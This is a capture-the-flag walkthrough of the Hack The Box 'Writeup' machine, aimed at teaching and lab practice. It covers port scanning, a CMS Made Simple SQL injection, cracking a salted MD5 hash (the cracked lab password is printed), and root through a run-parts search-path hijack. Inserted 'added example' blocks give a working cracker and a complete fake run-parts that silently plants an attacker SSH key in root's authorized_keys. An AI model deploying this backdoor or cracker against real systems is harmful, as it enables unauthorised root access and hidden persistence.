This post documents the complete walkthrough of Writeup, a retired vulnerable VM created by jkr, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=1000

Starting masscan 1.0.4 at 2019-06-11 06:06:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on
Discovered open port 22/tcp on

Nothing unusual about the ports. Let’s do one better and have nmap scan the discovered ports to establish the services.

# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.

Hmm. There’s an entry in robots.txt, calling me to check it out. Here’s what it looks like.

Pretty HTML :laughing:

CMS Made Simple

If you check out the HTML source of /writeup, you’ll see that CMS Made Simple was used.

And because this box is pretty new, you have to look for a relatively new exploit as well. For that, look no further than EDB-ID 46635, a time-based blind SQL injection in CMS Made Simple versions before 2.2.10 (CVE-2019-9053) that leaks the admin username, e-mail address, salt and password hash one character at a time. Running the exploit is pretty self-explanatory.

Once that’s done, we can go ahead and recover the password from the salted MD5 hash with John the Ripper.

# cat hash.txt

According to the exploit, the hash format is md5($s.$p): the salt is prepended to the password before hashing, so john needs a subformat that takes the salt alongside the hash rather than a plain MD5 mode.
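Before spending wordlist time in john it is worth confirming the concatenation order, because md5($s.$p) and md5($p.$s) are different dynamic subformats and picking the wrong one simply never cracks. The following is an added example, not the exploit's own cracking routine nor anything from the original post: a small POSIX sh cracker that tries a wordlist against a salted MD5 in both orders and reports which layout matched, plus a helper that emits the line john expects for dynamic_1017 (`user:$dynamic_1017$<hash>$<salt>`). It assumes coreutils `md5sum` (falling back to macOS `md5`); the salt and wordlist used in testing are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from EDB-ID 46635 or the post): confirm a salted-MD5 layout before cracking.
# CMS Made Simple stores md5($salt . $password), which john calls dynamic_1017.
# Assumption: md5sum (coreutils) or md5 (macOS) is on PATH.

# Hex MD5 of the string $1, without a trailing newline being hashed.
md5hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q          # macOS fallback
    fi
}

# crack_salted_md5 HASH SALT WORDLIST
# Tries every candidate in WORDLIST in both concatenation orders.
# Prints "<format> <password>" and returns 0 on a hit, returns 1 if nothing matched.
crack_salted_md5() {
    hash=$1; salt=$2; wordlist=$3
    while IFS= read -r pw || [ -n "$pw" ]; do
        if [ "$(md5hex "$salt$pw")" = "$hash" ]; then
            printf 'md5($s.$p) %s\n' "$pw"; return 0
        elif [ "$(md5hex "$pw$salt")" = "$hash" ]; then
            printf 'md5($p.$s) %s\n' "$pw"; return 0
        fi
    done < "$wordlist"
    return 1
}

# john_line USER HASH SALT
# Builds one hash.txt line in the dynamic_1017 (md5($s.$p)) input format.
john_line() {
    printf '%s:$dynamic_1017$%s$%s\n' "$1" "$2" "$3"
}
```

Feed the output of `john_line` into hash.txt and run `john --format=dynamic_1017 --wordlist=<list> hash.txt`; if the check above reports md5($p.$s) instead, the salt and hash belong in a different dynamic subformat and the john run would otherwise silently fail.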

# john --list=subformats
UserFormat = dynamic_1017  type = dynamic_1017: md5($s.$p) (long salt)

It was super quick!

Low-Privilege Shell

Perhaps the credential (jkr:raykayjay9) is meant for SSH? Well, there’s only one way to find out.

Baam. Straight to user.txt.

Privilege Escalation

During enumeration of jkr’s account, I noticed that it’s in the staff group, which is pretty unusual. Check out what the staff group can do.

This means that jkr, as a member of staff, can write to /usr/local/bin and /usr/local/sbin! Now I just need something running as root that executes a command from one of these two directories. Enter pspy.

See what happens when I log in.

Classic search path hijacking: a root process triggered by the login invokes run-parts by bare name rather than by absolute path, and its PATH lists /usr/local/sbin and /usr/local/bin ahead of the directory holding the real binary, so a same-named file planted there is found first. Armed with this knowledge, we can create the following “fake” run-parts.

It creates a .ssh directory in /root if it doesn’t exist and then echoes an SSH public key I control into authorized_keys. Lastly, we simply pass all the original options and arguments to the real run-parts, so the calling process sees normal behaviour and nothing looks broken.
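As an added example (not the post's own script, which is shown only as an image), here is a drop-in run-parts of the kind described above, written in POSIX sh so it runs under Debian's /bin/sh. It also carries a small helper that lists the PATH entries the current user can write to, which is the general check behind this class of hijack. Assumptions not taken from the post: the real binary lives at /bin/run-parts (Debian 9 layout), the key shown is a placeholder, and the target home, key and real-binary path can be overridden through environment variables so the functions can be exercised without root.

```shell
#!/bin/sh
# Added example: a "fake" run-parts for a search path hijack. Install it as
# /usr/local/bin/run-parts (writable by the staff group); when a root process
# resolves run-parts from /usr/local/bin first, plant_key runs as root.
#
# Assumptions (not from the post): real binary at /bin/run-parts; overrides via
# environment so the functions can be tested as an unprivileged user.

TARGET_HOME="${TARGET_HOME:-/root}"
# Placeholder key, replace with a public key whose private half you control.
ATTACKER_KEY="${ATTACKER_KEY:-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER attacker@kali}"
REAL_RUN_PARTS="${REAL_RUN_PARTS:-/bin/run-parts}"

# Print every PATH entry the current user can write to. Any command a privileged
# process invokes by bare name can be shadowed from one of these if it precedes
# the command's real location in that process's PATH.
writable_path_dirs() {
    old_ifs=$IFS; IFS=:
    for d in $PATH; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
    IFS=$old_ifs
}

# plant_key HOME KEY
# Ensure HOME/.ssh/authorized_keys exists with sane permissions and contains KEY
# exactly once. Idempotent because the wrapper fires on every login.
plant_key() {
    home=$1; key=$2
    mkdir -p "$home/.ssh" || return 1
    chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
    if ! grep -qxF -- "$key" "$home/.ssh/authorized_keys"; then
        printf '%s\n' "$key" >> "$home/.ssh/authorized_keys"
    fi
}

# Only act as the hijack when invoked under the hijacked name, so this file can
# also be sourced to reuse the functions above. Errors from plant_key are
# swallowed so an unprivileged invocation still behaves like the real binary.
case "$0" in
    *run-parts)
        plant_key "$TARGET_HOME" "$ATTACKER_KEY" 2>/dev/null
        # Hand the original options and arguments to the real binary unchanged.
        exec "$REAL_RUN_PARTS" "$@"
        ;;
esac
```

Copy the script to /usr/local/bin/run-parts, `chmod +x` it, then trigger the root-owned process the same way pspy showed it being triggered (here, by logging in again) and check that `/root/.ssh/authorized_keys` has been written before attempting `ssh root@<target>`. The `$0` guard means the file behaves as a hijack only under the planted name; run from any other path it just defines the two functions.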

Let’s test this concept.

Awesome. Getting root.txt is trivial.